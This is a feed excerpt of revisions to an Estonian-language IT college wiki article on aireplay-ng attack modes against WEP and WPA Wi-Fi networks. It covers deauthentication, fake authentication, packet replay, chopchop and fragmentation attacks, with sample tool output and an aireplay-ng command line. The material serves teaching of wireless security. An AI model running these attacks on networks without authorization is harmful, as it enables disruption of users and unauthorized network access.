NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30985</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30985"/>
		<updated>2011-05-10T10:51:31Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 7: Client-oriented fragmentation attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
